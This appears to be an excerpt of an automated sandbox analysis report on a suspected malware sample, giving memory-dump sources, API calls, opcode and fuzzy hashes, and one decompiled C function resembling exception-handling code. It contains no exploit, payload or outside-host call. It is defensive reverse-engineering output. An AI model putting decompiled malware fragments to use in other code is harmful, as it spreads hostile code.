                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f25c5
                                                                                                                                                                                                                                                                    0x6e1f25c5
                                                                                                                                                                                                                                                                    0x6e1f25cc
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f25d2
                                                                                                                                                                                                                                                                    0x6e1f25d6
                                                                                                                                                                                                                                                                    0x6e1f2632
                                                                                                                                                                                                                                                                    0x6e1f2634
                                                                                                                                                                                                                                                                    0x6e1f263c
                                                                                                                                                                                                                                                                    0x6e1f263e
                                                                                                                                                                                                                                                                    0x6e1f2640
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2642
                                                                                                                                                                                                                                                                    0x6e1f2648
                                                                                                                                                                                                                                                                    0x6e1f264a
                                                                                                                                                                                                                                                                    0x6e1f264c
                                                                                                                                                                                                                                                                    0x6e1f2661
                                                                                                                                                                                                                                                                    0x6e1f2661
                                                                                                                                                                                                                                                                    0x6e1f2663
                                                                                                                                                                                                                                                                    0x6e1f2692
                                                                                                                                                                                                                                                                    0x6e1f2699
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2699
                                                                                                                                                                                                                                                                    0x6e1f2667
                                                                                                                                                                                                                                                                    0x6e1f2668
                                                                                                                                                                                                                                                                    0x6e1f266a
                                                                                                                                                                                                                                                                    0x6e1f266c
                                                                                                                                                                                                                                                                    0x6e1f266c
                                                                                                                                                                                                                                                                    0x6e1f266e
                                                                                                                                                                                                                                                                    0x6e1f2670
                                                                                                                                                                                                                                                                    0x6e1f2672
                                                                                                                                                                                                                                                                    0x6e1f2686
                                                                                                                                                                                                                                                                    0x6e1f2686
                                                                                                                                                                                                                                                                    0x6e1f2689
                                                                                                                                                                                                                                                                    0x6e1f268b
                                                                                                                                                                                                                                                                    0x6e1f268b
                                                                                                                                                                                                                                                                    0x6e1f268c
                                                                                                                                                                                                                                                                    0x6e1f268c
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2674
                                                                                                                                                                                                                                                                    0x6e1f2674
                                                                                                                                                                                                                                                                    0x6e1f2674
                                                                                                                                                                                                                                                                    0x6e1f267d
                                                                                                                                                                                                                                                                    0x6e1f267e
                                                                                                                                                                                                                                                                    0x6e1f2680
                                                                                                                                                                                                                                                                    0x6e1f2682
                                                                                                                                                                                                                                                                    0x6e1f2682
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2674
                                                                                                                                                                                                                                                                    0x6e1f2672
                                                                                                                                                                                                                                                                    0x6e1f264e
                                                                                                                                                                                                                                                                    0x6e1f2655
                                                                                                                                                                                                                                                                    0x6e1f2655
                                                                                                                                                                                                                                                                    0x6e1f2657
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2659
                                                                                                                                                                                                                                                                    0x6e1f265a
                                                                                                                                                                                                                                                                    0x6e1f265d
                                                                                                                                                                                                                                                                    0x6e1f265f
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f265f
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2655
                                                                                                                                                                                                                                                                    0x6e1f25d8
                                                                                                                                                                                                                                                                    0x6e1f25db
                                                                                                                                                                                                                                                                    0x6e1f25e0
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f25e9
                                                                                                                                                                                                                                                                    0x6e1f25eb
                                                                                                                                                                                                                                                                    0x6e1f25f1
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f25f7
                                                                                                                                                                                                                                                                    0x6e1f25fd
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2603
                                                                                                                                                                                                                                                                    0x6e1f2605
                                                                                                                                                                                                                                                                    0x6e1f260e
                                                                                                                                                                                                                                                                    0x6e1f2612
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2618
                                                                                                                                                                                                                                                                    0x6e1f261b
                                                                                                                                                                                                                                                                    0x6e1f261d
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2624
                                                                                                                                                                                                                                                                    0x6e1f2626
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2628
                                                                                                                                                                                                                                                                    0x6e1f262c
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f262c
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2517
                                                                                                                                                                                                                                                                    0x6e1f2517
                                                                                                                                                                                                                                                                    0x6e1f2517
                                                                                                                                                                                                                                                                    0x6e1f251e
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2520
                                                                                                                                                                                                                                                                    0x6e1f2521
                                                                                                                                                                                                                                                                    0x6e1f2523
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2523
                                                                                                                                                                                                                                                                    0x6e1f254b
                                                                                                                                                                                                                                                                    0x6e1f254d
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f255d
                                                                                                                                                                                                                                                                    0x6e1f255f
                                                                                                                                                                                                                                                                    0x6e1f2561
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2567
                                                                                                                                                                                                                                                                    0x6e1f256e
                                                                                                                                                                                                                                                                    0x6e1f259a
                                                                                                                                                                                                                                                                    0x6e1f259a
                                                                                                                                                                                                                                                                    0x6e1f259c
                                                                                                                                                                                                                                                                    0x6e1f259e
                                                                                                                                                                                                                                                                    0x6e1f25b2
                                                                                                                                                                                                                                                                    0x6e1f25b4
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f25a0
                                                                                                                                                                                                                                                                    0x6e1f25a0
                                                                                                                                                                                                                                                                    0x6e1f25a0
                                                                                                                                                                                                                                                                    0x6e1f25a9
                                                                                                                                                                                                                                                                    0x6e1f25aa
                                                                                                                                                                                                                                                                    0x6e1f25ac
                                                                                                                                                                                                                                                                    0x6e1f25ae
                                                                                                                                                                                                                                                                    0x6e1f25ae
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f25a0
                                                                                                                                                                                                                                                                    0x6e1f2570
                                                                                                                                                                                                                                                                    0x6e1f2573
                                                                                                                                                                                                                                                                    0x6e1f2575
                                                                                                                                                                                                                                                                    0x6e1f2587
                                                                                                                                                                                                                                                                    0x6e1f2587
                                                                                                                                                                                                                                                                    0x6e1f258a
                                                                                                                                                                                                                                                                    0x6e1f258c
                                                                                                                                                                                                                                                                    0x6e1f258c
                                                                                                                                                                                                                                                                    0x6e1f258d
                                                                                                                                                                                                                                                                    0x6e1f258d
                                                                                                                                                                                                                                                                    0x6e1f2593
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2577
                                                                                                                                                                                                                                                                    0x6e1f2577
                                                                                                                                                                                                                                                                    0x6e1f2577
                                                                                                                                                                                                                                                                    0x6e1f257e
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2580
                                                                                                                                                                                                                                                                    0x6e1f2580
                                                                                                                                                                                                                                                                    0x6e1f2581
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2581
                                                                                                                                                                                                                                                                    0x6e1f2583
                                                                                                                                                                                                                                                                    0x6e1f2585
                                                                                                                                                                                                                                                                    0x6e1f2598
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2598
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2585
                                                                                                                                                                                                                                                                    0x6e1f24f7
                                                                                                                                                                                                                                                                    0x6e1f24fa
                                                                                                                                                                                                                                                                    0x6e1f24fd
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f24ff
                                                                                                                                                                                                                                                                    0x6e1f2501
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2501
                                                                                                                                                                                                                                                                    0x6e1f24c6
                                                                                                                                                                                                                                                                    0x6e1f24c8
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1F2536
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                                                                                    • Opcode ID: 136eb7171ca21079c798de0533d23185f81d67bed989a4a49b79301de7724af6
                                                                                                                                                                                                                                                                    • Instruction ID: 87b0363088bc313540c0c50e4206e1ca8c308ee295a2eb8a54ceaa69787ef100
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 136eb7171ca21079c798de0533d23185f81d67bed989a4a49b79301de7724af6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C661D370714682CFDB49CFA9D4A079933F5AB95325B348428D826C7294E770D8C3EAD0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E23769F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                    • Opcode ID: 033cccaf3da5d57e74754b14db15e4be6ff3472633afb8503fdec265a3d2bfa5
                                                                                                                                                                                                                                                                    • Instruction ID: 780b29c05e4bc55bdc5a5db214b094e9fd788259d0e73781dc230f617fc034f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 033cccaf3da5d57e74754b14db15e4be6ff3472633afb8503fdec265a3d2bfa5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33518FB1E1062ACBDF45CFA5C495BAAB7F3FB49321F208429C415EB280E775A944CF60
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: fafe8e7cbfe562492131106695bda545c9bbcdc13074a86533160bef5daf75e1
                                                                                                                                                                                                                                                                    • Instruction ID: 2e98ca755537e2e787a2543068c41013064123b00a166d07067bf1e0a5c79376
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fafe8e7cbfe562492131106695bda545c9bbcdc13074a86533160bef5daf75e1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28419EB590461DEFDB149FA9CC88EEABBBAAB55304F1446D9E41D93200EA359E848F10
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 55bc30d6c6429517ee87b7d361a02d3ecae668e9560ddf759b7909fe9d3234d9
                                                                                                                                                                                                                                                                    • Instruction ID: 296ba85c975db74c687fc26b36ad4b7351a8dab3bdf8c152b7087c2aab334b97
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55bc30d6c6429517ee87b7d361a02d3ecae668e9560ddf759b7909fe9d3234d9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6521B673F20439477B0CC47ECC572BDB6E1D78C501745423AE8A6EA2C1D968D917E2E4
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f75524db06b3e13e0a993bcba85766db3ee711f97d196cc680d7a4204b900a11
                                                                                                                                                                                                                                                                    • Instruction ID: 21dda1aefcdb0fbde34b161ea16ac3d777475c077d54038a64b487f0be3a3f4d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f75524db06b3e13e0a993bcba85766db3ee711f97d196cc680d7a4204b900a11
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30117763F30C395B675C81AD8C172BAA5D3EBD825070F533AD826EB284E994DE13D290
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                                                    			E6E1F2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                                                                                                    					E6E1F23CB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                    					_t49 = E6E1F2485(_t66);
                                                                                                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                    										E6E1F2370(_t55, _t66);
                                                                                                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                                    										E6E1F23CB(_t89, _t66, 0);
                                                                                                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                                    										E6E1F2467(_t82[2]);
                                                                                                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                                                                                                    										 *(_t82[2])(1);
                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                    0x6e1f2268
                                                                                                                                                                                                                                                                    0x6e1f2269
                                                                                                                                                                                                                                                                    0x6e1f226a
                                                                                                                                                                                                                                                                    0x6e1f226d
                                                                                                                                                                                                                                                                    0x6e1f226f
                                                                                                                                                                                                                                                                    0x6e1f2272
                                                                                                                                                                                                                                                                    0x6e1f2273
                                                                                                                                                                                                                                                                    0x6e1f2275
                                                                                                                                                                                                                                                                    0x6e1f2276
                                                                                                                                                                                                                                                                    0x6e1f2277
                                                                                                                                                                                                                                                                    0x6e1f227a
                                                                                                                                                                                                                                                                    0x6e1f2284
                                                                                                                                                                                                                                                                    0x6e1f2335
                                                                                                                                                                                                                                                                    0x6e1f233c
                                                                                                                                                                                                                                                                    0x6e1f2345
                                                                                                                                                                                                                                                                    0x6e1f228a
                                                                                                                                                                                                                                                                    0x6e1f228a
                                                                                                                                                                                                                                                                    0x6e1f2290
                                                                                                                                                                                                                                                                    0x6e1f2296
                                                                                                                                                                                                                                                                    0x6e1f2299
                                                                                                                                                                                                                                                                    0x6e1f229c
                                                                                                                                                                                                                                                                    0x6e1f22a0
                                                                                                                                                                                                                                                                    0x6e1f22a5
                                                                                                                                                                                                                                                                    0x6e1f22aa
                                                                                                                                                                                                                                                                    0x6e1f232a
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f22ac
                                                                                                                                                                                                                                                                    0x6e1f22ac
                                                                                                                                                                                                                                                                    0x6e1f22b8
                                                                                                                                                                                                                                                                    0x6e1f22ba
                                                                                                                                                                                                                                                                    0x6e1f2315
                                                                                                                                                                                                                                                                    0x6e1f2315
                                                                                                                                                                                                                                                                    0x6e1f231b
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f22bc
                                                                                                                                                                                                                                                                    0x6e1f22cb
                                                                                                                                                                                                                                                                    0x6e1f22cd
                                                                                                                                                                                                                                                                    0x6e1f22ce
                                                                                                                                                                                                                                                                    0x6e1f22cf
                                                                                                                                                                                                                                                                    0x6e1f22d2
                                                                                                                                                                                                                                                                    0x6e1f22d2
                                                                                                                                                                                                                                                                    0x6e1f22d4
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f22d6
                                                                                                                                                                                                                                                                    0x6e1f22d6
                                                                                                                                                                                                                                                                    0x6e1f2320
                                                                                                                                                                                                                                                                    0x6e1f22d8
                                                                                                                                                                                                                                                                    0x6e1f22d8
                                                                                                                                                                                                                                                                    0x6e1f22dc
                                                                                                                                                                                                                                                                    0x6e1f22e4
                                                                                                                                                                                                                                                                    0x6e1f22e9
                                                                                                                                                                                                                                                                    0x6e1f22ee
                                                                                                                                                                                                                                                                    0x6e1f22fa
                                                                                                                                                                                                                                                                    0x6e1f2302
                                                                                                                                                                                                                                                                    0x6e1f2309
                                                                                                                                                                                                                                                                    0x6e1f230f
                                                                                                                                                                                                                                                                    0x6e1f2313
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f2313
                                                                                                                                                                                                                                                                    0x6e1f22d6
                                                                                                                                                                                                                                                                    0x6e1f22d4
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f22ba
                                                                                                                                                                                                                                                                    0x6e1f232e
                                                                                                                                                                                                                                                                    0x6e1f232e
                                                                                                                                                                                                                                                                    0x6e1f232e
                                                                                                                                                                                                                                                                    0x6e1f22aa
                                                                                                                                                                                                                                                                    0x6e1f234a
                                                                                                                                                                                                                                                                    0x6e1f2351

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                                    • Instruction ID: 9378f824f031dcfcf797170683064f6a80b7bae7882c33c3875c8a607d09ca1e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4221B372900245DFCB10DFA8C8809ABBBE9FF4D350B468568D9159B245DB30FA56DBE0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605439378.000000006E271000.00000040.00020000.sdmp, Offset: 6E271000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                                                                                    • Instruction ID: c0e4879e9d4cb7968dbb4138cf1b60f73556dd2059539dfc73506be84196add7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9311D3733402059FDB64DE99DCA1EA273EAEF89330B258166ED08CB315D735E845C760
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605439378.000000006E271000.00000040.00020000.sdmp, Offset: 6E271000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                                    • Instruction ID: e89769c3e0de1335d59a9362543de391a57cb8c539f715cbb07bde97182442a7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B701F5F731424A8FDB28CF6DD994D6AB7E9EBC1321B15807EC946C3616D230E941CA20
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: bebc977af7d34d5d22399dccb5525bf99a1a508f202cdd2d67311cd910c47a08
                                                                                                                                                                                                                                                                    • Instruction ID: 175b0de4386313325b0013634422e8aa8d5e7e7c242984186b6367aa85fa39d2
